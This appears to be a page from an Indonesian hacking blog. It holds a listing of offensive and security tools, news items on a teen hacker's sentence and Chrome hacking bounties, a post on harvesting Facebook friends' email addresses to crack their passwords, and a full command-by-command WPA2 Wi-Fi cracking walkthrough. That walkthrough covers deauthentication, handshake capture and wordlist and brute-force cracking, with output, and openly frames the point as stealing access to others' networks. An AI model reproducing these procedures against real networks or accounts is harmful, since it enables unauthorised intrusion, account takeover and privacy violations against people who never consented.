Hacking Tools 2013 Update

Ayo buruan download penetration testing 2013 and security tools 2013, networking tools 2013, gmail hacking tools 2013, learn ethical hacking 2013, vulnerability assessment 2013, penetration testing 2013, email hacking 2013, password hacking 2013, reverse engineering 2013. Download hacking tools, networking tools, gmail hacking, learn ethical hacking, vulnerability, penetration testing, hack email, hacking, password hacking, reverse engineering 2013, wifi hacker 2013. Hacker Tools 2013, Hack Tool 2013, Hacker Tool 2013, Hacking Tool 2013, Hack Tool 2013, Cracking Tools 2013, Cracker Tools 2013, Cracking Tool 2013, Cracker Tool 2013, Crack Tools 2013, Crack Tool 2013, Security Tool 2013, Pentester Tool 2013, Password Cracker 2013, Password Hacking 2013.

1. PWN STAR

Sebuah script bash untuk meluncurkan AP , dapat dikonfigurasi dengan berbagai macam pilihan serangan. Termasuk sejumlah script index.html dan server php, untuk phishing. Dapat bertindak sebagai multi-klien captive portal menggunakan php dan iptables. Eksploitasi klasik seperti kejahatan-PDF, De-auth dengan aireplay, dll.

Fitur Umum:

1. Mengelola Antarmuka dan MAC Spoofing
2. Mengatur sniffing
3. Web phishing
4. Karmetasploit
5. WPA handshake
6. De-auth klien
7. Mengelola Iptables

Download PwnStar Disini:

2. ZED ATTACK PROXY (ZAP)

(ZAP) adalah alat penetrasi pengujian terpadu untuk menemukan kerentanan dalam aplikasi web. Tools ini dirancang untuk digunakan oleh orang-orang dengan berbagai pengalaman security dan dengan demikian sangat ideal untuk para pengembang dan penguji fungsional yang baru untuk penetration testing serta menjadi tambahan yang berguna untuk toolbox tester.

Fitur Utama:

1. Intercepting Proxy
2. Active scanner
3. Passive scanner
4. Brute Force scanner
5. Spider
6. Fuzzer
7. Port Scanner
8. Dynamic SSL certificates
9. API
10. Beanshell integration

Download ZAP Disini:

3. SET (SOCIAL ENGINEERING TOOLKIT)

Tools yang berfokus pada menyerang unsur kelemahan dan kelengahan manusia. Tool ini sangat banyak digunakan saat ini dan merupakan salah satu tools yang sukses di demonstrasikan di Defcon.

Fitur Utama:

• Spear-Phishing Attack Vector
• Java Applet Attack Vector
• Metasploit Browser Exploit Method
• Credential Harvester Attack Method
• Tabnabbing Attack Method
• Man Left in the Middle Attack Method
• Web Jacking Attack Method
• Multi-Attack Web Vector
• Infectious Media Generator
• Teensy USB HID Attack Vector

Download Social Engineering Toolkit Disini:

4. BURP SUITE

Burp Suite adalah alat yang sangat bagus sekali untuk pengujian keamanan aplikasi web. Alat ini sangat bagus untuk pentester dan peneliti keamanan. Ini berisi berbagai alat dengan antarmuka banyak di antara mereka yang dirancang untuk memudahkan dan mempercepat proses menyerang aplikasi website.

Fungsi Umum:

1. Intersepsi proxy
2. Radar crawling dan spider
3. Webapps scanner
4. Alat penyerangan
5. Repeater dan sequencer tools

Download Burp Suite Disini:

5. ETTERCAP

Ettercap adalah sniffer multiguna / interceptor / logger untuk Local Area Network. Mendukung diseksi aktif dan pasif dari banyak protokol (bahkan yang dalam bentuk kode) dan mencakup banyak fitur untuk analisis jaringan dan host.

Fungsi Umum:

1. Untuk melakukan capture traffic dan data
2. Untuk melakukan logging network
3. Dll

Download Ettercap Disini:

6. SANS INVESTIGATIVE FORENSIC TOOLKIT (SIFT)

The SANS Investigative Forensic Toolkit (SIFT) Workstation adalah VMware Appliance yang bisa di konfigurasi dengan semua kebutuhan untuk melakukan digital forensik secara mendetail. Kompatible dengan Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. Versi baru telah sepenuhnya dibangun kembali pada basis Ubuntu dengan banyak tools tambahan dan kemampuan yang digunakan dalam teknologi modern forensik.

Fungsi Umum SIFT:

1. iPhone, Blackberry, and Android Forensic Capabilities
2. Registry Viewer (YARU)
3. Compatibility with F-Response Tactical, Standard, and Enterprise
4. PTK 2.0 (Special Release – Not Available for Download)
5. Automated Timeline Generation via log2timeline
6. Many Firefox Investigative Plugins
7. Windows Journal Parser and Shellbags Parser (jp and sbag)
8. Many Windows Analysis Utilities (prefetch, usbstor, event log, and more)
9. Complete Overhaul of Regripper Plugins (added over 80 additional plugins)

Download SANS Investigative Forensic Toolkit (SIFT) Disini:

7. WIRESHARK

Wireshark adalah alat yang paling banyak digunakan dan paling populer pada dunia analyzer protokol, dan merupakan standar de facto di banyak industri dan lembaga pendidikan untuk menganalisa jaringan di berbagai protokol.

Fungsi Umum:

1. Live capture and offline analysis
2. Standard three-pane packet browser
3. Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
4. Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
5. The most powerful display filters in the industry
6. Rich VoIP analysis
7. Read/write many different capture file formats
8. Dll

Download WireShark Disini:

8. WEBSPLOIT

WebSploit adalah Open Source Project untuk Scan dan Analysis Remote System dari kelemahan-kelemahan pada aplikasi website.

Fitur Utama:
[>]Social Engineering Works
[>]Scan,Crawler & Analysis Web
[>]Automatic Exploiter
[>]Support Network Attacks
—-
[+]Autopwn – Used From Metasploit For Scan and Exploit Target Service
[+]wmap – Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector – inject reverse & bind payload into file format
[+]phpmyadmin Scanner
[+]LFI Bypasser
[+]Apache Users Scanner
[+]Dir Bruter
[+]admin finder
[+]MLITM Attack – Man Left In The Middle, XSS Phishing Attacks
[+]MITM – Man In The Middle Attack
[+]Java Applet Attack
[+]MFOD Attack Vector
[+]USB Infection Attack
[+]ARP Dos Attack
[+]Web Killer Attack
[+]Fake Update Attack
[+]Fake Access point Attack

Download WebSploit Framework Disini:

9. WINAUTOPWN

WinAutoPWN merupakan sebuah tools yang digunakan untuk mengexploitasi secara langsung Windows Framework, sehingga secara otomatis kita yang akan menjadi administrator di windows tersebut. Banyak digunakan oleh “Defacer” Indonesia untuk melakukan deface terhadap Windows Server 

Download WinAutoPWN Disini:

10. HASHCAT

Hashcat adalah sebuah tools untuk crack berbagai password yang di encrypt, sangat powerfull untuk recovery password.

Fungsi Umum:

1. Multi-Threaded
2. Free
3. Multi-Hash (up to 24 million hashes)
4. Multi-OS (Linux, Windows and OSX native binaries)
5. Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, …)
6. SSE2 accelerated
7. All Attack-Modes except Brute-Force and Permutation can be extended by rules
8. Very fast Rule-engine
9. Rules compatible with JTR and PasswordsPro
10. Possible to resume or limit session
11. Automatically recognizes recovered hashes from outfile at startup
12. Can automatically generate random rules
13. Load saltlist from external file and then use them in a Brute-Force Attack variant
14. Able to work in an distributed environment
15. Specify multiple wordlists or multiple directories of wordlists
16. Number of threads can be configured
17. Threads run on lowest priority
18. 30+ Algorithms implemented with performance in mind
19. … and much more

Download HashCat Disini:

11. UNISCAN

Uniscan adalah scanner untuk aplikasi web, yang ditulis dalam perl untuk Linux. Saat ini versi Uniscan adalah 6,2.

Fungsi Umum:

1. Identification of system pages through a Web Crawler.
2. Use of threads in the crawler.
3. Control the maximum number of requests the crawler.
4. Control of variation of system pages identified by Web Crawler.
5. Control of file extensions that are ignored.
6. Test of pages found via the GET method.
7. Test the forms found via the POST method.
8. Support for SSL requests (HTTPS).
9. Proxy support.
10. Generate site list using Google.
11. Generate site list using Bing.
12. Plug-in support for Crawler.
13. Plug-in support for dynamic tests.
14. Plug-in support for static tests.
15. Plug-in support for stress tests.
16. Multi-language support.
17. Web client.

Download Uniscan Disini:

12. OLYYDBG

OllyDbg adalah 32-bit assembler debugger untuk Microsoft Windows. Penekanan pada analisis kode biner membuatnya sangat berguna dalam kasus-kasus di mana sourcecode tidak tersedia.

Fungsi Umum:

1. Intuitive user interface, no cryptical commands
2. Code analysis – traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings
3. Directly loads and debugs DLLs
4. Object file scanning – locates routines from object files and libraries
5. Allows for user-defined labels, comments and function descriptions
6. Understands debugging information in Borland^® format
7. Saves patches between sessions, writes them back to executable file and updates fixups
8. Open architecture – many third-party plugins are available
9. No installation – no trash in registry or system directories
10. Debugs multithread applications
11. Attaches to running programs
12. Configurable disassembler, supports both MASM and IDEAL formats
13. MMX, 3DNow! and SSE data types and instructions, including Athlon extensions
14. Full UNICODE support
15. Dynamically recognizes ASCII and UNICODE strings – also in Delphi format!
16. Recognizes complex code constructs, like call to jump to procedure
17. Decodes calls to more than 1900 standard API and 400 C functions
18. Gives context-sensitive help on API functions from external help file
19. Sets conditional, logging, memory and hardware breakpoints
20. Traces program execution, logs arguments of known functions
21. Shows fixups
22. Dynamically traces stack frames
23. Searches for imprecise commands and masked binary sequences
24. Searches whole allocated memory
25. Finds references to constant or address range
26. Examines and modifies memory, sets breakpoints and pauses program on-the-fly
27. Assembles commands into the shortest binary form
28. Starts from the floppy disk

Download Ollydbg Disini:

13. BBQSQL

BBQSQL merupakan Opensource SQL injection tools dengan kerangka kerja khusus yang dirancang untuk menjalankan proses secara hyper cepat, agnostik database, mudah untuk setup, dan mudah untuk memodifikasi. Ini adalah satu lagi rilis mengagumkan dari Arsenal 2012 Blackhat USA. Ketika melakukan penilaian keamanan aplikasi, kita sering menemukan kerentanan SQL yang sulit untuk di exploitasi, dengan tools ini akan menjadi sangat mudah.

BBQSQL ditulis dengan bahasa pemrograman Python. Hal ini sangat berguna ketika menyerang kerentanan SQL injection rumit. BBQSQL juga merupakan alat semi-otomatis, yang memungkinkan sedikit kustomisasi bagi mereka yang sulit untuk memicu temuan injeksi SQL. Alat ini dibangun untuk menjadi agnostik database dan sangat serbaguna. Ia juga memiliki UI intuitif untuk membuat pengaturan serangan jauh lebih mudah.

Fungsi Umum:

1. SQL Injection Tools
2. URL
3. HTTP Method
4. Headers
5. Cookies
6. Encoding methods
7. Redirect behavior
8. Files
9. HTTP Auth
10. Proxies

Download BBQSQL Disini:

14. CRYPTOHAZE

Tools untuk crack password / hash dimana cryptohaze mendukung CUDA, OpenCL, dan CPU kode (SSE, AVX, dll). Bisa berjalan di OS yang support CUDA. Semua ini ditujukan untuk pentester agar lebih mudah dalam melakukan crack hash.

Fungsi Umum:

1. Crack berbagai macam hash
2. Menampilkan hasil dari crackhash
3. Cracking di berbagai platform OS

Download Cryptohaze Disini:

15. SAMURAI WEB TESTING FRAMEWORK (SWTF)

SWTF ini digunakan untuk melakukan pengujian / pentest terhadap web application, digunakan untuk menemukan kelemahan dan melakukan exploitasi terhadap web tersebut. Sangat komplit dan banyak digunakan didunia termasuk digunakan oleh salah satu staff binushacker 

Fungsi Umum:

1. Web Scanner
2. Web Mapping
3. Web Exploitation

Download The Samurai Web Testing Framework Disini:

Tools di atas wajib untuk dimiliki di 2013, selamat untuk mencoba dan bereksperimen di awal tahun untukBinusHacker Family diseluruh dunia khususnya di nusantara.

Salam BinusHacker Family 

Read more »

Hacker Remaja 15 Tahun Dihukum 6 Tahun Tanpa Internet & Komputer

California, AS - Akibat melakukan berbagai kenakalan di dunia maya, remaja berusia 15 tahun ini dihukum dengan cara tidak boleh menyentuh komputer atau bermain internet selama enam tahun.

Remaja tersebut dikenal dengan nama "Cosmo the God", yang pernah berhasil membuat sistem agar ia bisa bisa masuk ke dalam sistem PayPal dan Amazon secara ilegal. Belakangan ia juga diketahui sebagai salah satu anggota kelompok hacker UG Nazi yang sempat menghebohkan.

Ya, beberapa waktu lalu ia dan kelompoknya sempat membuat geger dengan melumpuhkan sejumlah situs penting seperti NASDAQ, CIA, dan UFC. Hal ini dilakukan sebagai bentuk keras terhadap kebijakan SOPA (Stop Online Piracy Act) yang saat itu marak diperbincangkan.

Cosmo yang akhirnya berhasil dilacak dan tertangkap, diputuskan bersalah oleh pengadilan di Long Beach, California atas tudingan pencurian kartu kredit, ancaman bom, perusakan online, dan pencurian identitas.

Beruntung Cosmo masih berusia 15 tahun, oleh karena itu ia hanya dijatuhi hukuman percobaan sampai ulang tahunnya yang ke 21. Selama waktu itu, ia tidak boleh menggunakan internet tanpa persetujuan dari petugas pembebasan bersyaratnya.

Selain itu, ia juga diminta untuk menyerahkan semua akun login dan password serta melaporkan secara tertulis semua perangkat yang dimilikinya jika perangkat tersebut punya kemampuan terhubung ke internet.

Hukuman lainnya ia juga berhubungan dengan anggota UG Nazi atau Anonymous, serta beberapa orang lain yang memiliki latar belakang hacker. Seluruh komputer dan gadgetnya pun harus rela disita oleh pihak berwajib.

Seperti dikutip detikINET dari wired, Selasa (12/11/2012), pihak pengadilan pun mewanti-wanti agar Cosmo tidak melanggar salah satu keputusan tersebut. Sebab kalau sampai terjadi, ia harus rela dijebloskan ke dalam penjara selama tiga tahun.

Dengan seluruh keahliannya Cosmo memang bisa dikatakan salah satu remaja yang cukup jenius. Berkat kemampuannya itu, bukan tidak mungkin ia bisa menjadi salah satu sosok yang disegani di dunia TI di kemudian hari.

Keputusan pengadilan untuk menjauhkannya dari internet selama 6 tahun pun dianggap terlalu berlebihan oleh sebagian pihak.

"Mereka bisa saja mengurungnya selama 3 tahun dan kemudian membebaskannya secara bersyarat. Tapi menjauhkannya dari internet selama 6 tahun, ini terlalu keras," kata Jay Leiderman, pengacara Cosmo.

Read more »

Tips Melihat Email Facebook Teman Kita

Yups, ini adalah postingan pertama ane di Binus Hacker mudah-mudahan berkesan di hati agan agan (hagagagagag..)

Kali ini berbagi mengenai cara melihat email teman di facebook yang kemudian bisa digunakan untuk hacking password facebook, hal ini bisa dilakukan melalui informasi email tersebut, download facebook account hacking melalui informasi email, facebook password cracker by binushacker family dengan email & merupakan salah satu facebook hacking tips and tricks 2013 untuk mencuri informasi email.

Sesuai judul diatas saya akan membagikan ke agan-agan cara melihat Email Teman facebook agan (berguna bagi socenger socenger jahil,hihihihihi  )

Firstly/pertama, login ke Akun yahoo yang agan gunakan login ke facebook

Nah, udah masuk ke akun yahoo lanjut ke tab “kontak”, klik Import Kontak

Karena kita akan melihat email teman facebook, maka kta pilih/klik facebook nanti akan ada layar pop up yang muncul, klik ya/yes

Tunggu proses import yang di lakukan oleh yahoo

Setelah proses impor selesai klik back to contact /selesai

Jika agan masih ingin melihat emailnya, klik tindakan -> cetak semua

Lalu klik,tampilan untuk cetak

Taraaaa….beratus ratus email muncul di tab baru
hehehehe 

*NB : segala tindakan selanjutnya yang di ambil oleh pembaca bukan tanggung jawab penulis,karena penulis cuma berbagi trik.
By : AnonK7

Read more »

Hacker Bawa Pulang Rp 550 jt Setelah Berhasil Tembus Keamanan Google Crome

Google menantang para hacker untuk menemukan celah keamanan di browser Chrome. Seorang hacker berhasil menjawab tantangan tersebut sehingga menggondol hadiah USD 60 ribu atau sekitar Rp 550 juta. Sergey Glazunov, hacker asal Rusia ini menemukan celah keamanan remote code execution di browser Chrome. Dia mendemonstrasikan bagaimana memanfaatkan celah itu untuk lolos dari Chrome sandbox, sebuah sistem untuk memblokir hacker yang ingin mengontrol perangkat pengguna.

Sesudah lolos, dia pun berhasil menjalankan kode yang tidak terotorisasi di sistem komputer Windows 7. Kebolehannya itu dipertunjukkan pada kontes Google Pwnium yang diadakan Google di Kanada. Pada kontes tersebut, Google menyediakan hadiah uang tunai pada para hacker yang berhasil menembus sistem keamanannya. Total hadiah yang disediakan mencapai USD 1 juta. "Ekspoitasi yang dilakukannya impresif. Hal itu memerlukan pemahaman mendalam tentang bagaimana Chrome bekerja.

Sungguh sangat sulit dan itu sebabnya kami membayarnya USD 60 ribu," tukas Justin Schuh, teknisi Google Chrome. Google pun langsung menambal celah keamanan yang ditemukan Sergey sehingga browser Google Chrome pun menjadi lebih aman digunakan. Demikian seperti dilansir Telegraph, Jumat (9/3/2012).

Read more »

Kompetisi Jebol Chrome, Google Beri Hadiah 9 Miliar

Peramban Google Chrome turut berpartisipasi dalam festival retas maraton (hackathon) tahunan yang diselenggarakan pada Rabu, 6 Maret 2012 di gedung CanSec West Security, Vanchouver, Kanada. Selama tiga tahun terakhir, mesin peselancar Chrome belum pernah jebol. Adapun peramban lain seperti Firefox, Internet Explorer, dan Safari sudah lebih dulu takluk oleh para peretas.

Google mengomentari kompetisi ini melalui blognya, "Kendati kami bangga dengan rekor tak terkalahkan, namun kami khawatir hal tersebut menyebabkan sulitnya mengembangkan situs ini". Agar pertandingan lebih menarik, Google membuat taruhannya menjadi lebih tinggi.

Situs yang merajai mesin pencari itu tidak hanya menawarkan hadiah bagi yang berhasil membajak Chrome, tapi juga menyediakan US$ 20 ribu atau sekitar Rp 182 juta bagi yang mampu meretas piranti lunak Windows, Flash, dan device drivers.

Google pun siap memberikan US$ 40 ribu atau Rp 364 juta bagi yang berhasil meretas Chrome ke bagian yang lebih spesifik dan membasmi virus. Hadiah semakin tinggi jika peserta berhasil meretas Chrome secara keseluruhan. Google rela membuang US$ 60 ribu atau Rp 545 juta bagi yang sukses menyusup ke mesin peselancar teranyar itu.

Total hadiah senilai US$ 1 juta atau Rp 9 miliar tidak diberikan kepada satu pemenang. Jumlah itu dibagi-bagikan untuk beberapa pemenang.

"Kami memberikan kesempatan bagi orang yang ingin mempelajari sistem kami," ujar pihak Google melalui blognya. "Selain itu, kami ingin orang dapat memperbaiki sistem dari ancaman virus."

Read more »

Wireless Hacking – Cracking WPA / PSK Key

Pasti begitu banyak yang mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan Password! Sial klo sedang mau wireless’an eh di password. Nah berikut ini adalah cara untuk melakukan Hacking / Cracking terhadap WPA / PSK yang di password.
Oke, yang diperlukan adalah:
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda
2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.
3. Koneksi wireless / wireless card
4. WPA yang ada di laptop anda.
5. John the ripper password cracker.
6. Aircrack-ng & airodump-ng (Aircrack package dah)
Download BackTrack 5 Disini:

Download Wordlist John The Ripper Disini:

Biasanya tools yang dibutuhkan diatas sudah lengkap ada di BackTrack, klo bukan BT ya silakan Install

Oke mari kita lanjutkan:
1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya:
root@binushacker:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Zydas zd1211 zd1211rw – [phy1]
(monitor mode enabled on mon0)
2. Khekhehehe.. Ternyata ada yang nongol, yuk mari kita jadikan target wireless tersebut:

root@binushacker:~# airodump-ng mon0
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless
3. Wokeh, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless

root@binushacker:~# airodump-ng mon0 –channel 11 –bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2
CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless

Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.
Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:
4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:

root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@binushacker:~#

5. Setelah logout & user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 - 6 0 161
6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:

root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...
Aircrack-ng 1.1 r1904
[00:00:00] 48 keys tested (489.60 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
Nah, passwordnya ketemu: W!R3L3$$PWD
7. Klo anda gak mau pake wordlist, ya biasanya menunggu agak lama, apalagi klo komputernya lemot bisa berabe. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:

root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...
Aircrack-ng 1.1 r1904
[00:00:22] 11484 keys tested (534.50 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$$PWD
Untuk lebih detailnya, silakan lihat video berikut:

Sumber : http://www.binushacker.net/wireless-hacking-cracking-wpa-psk-key.html

Read more »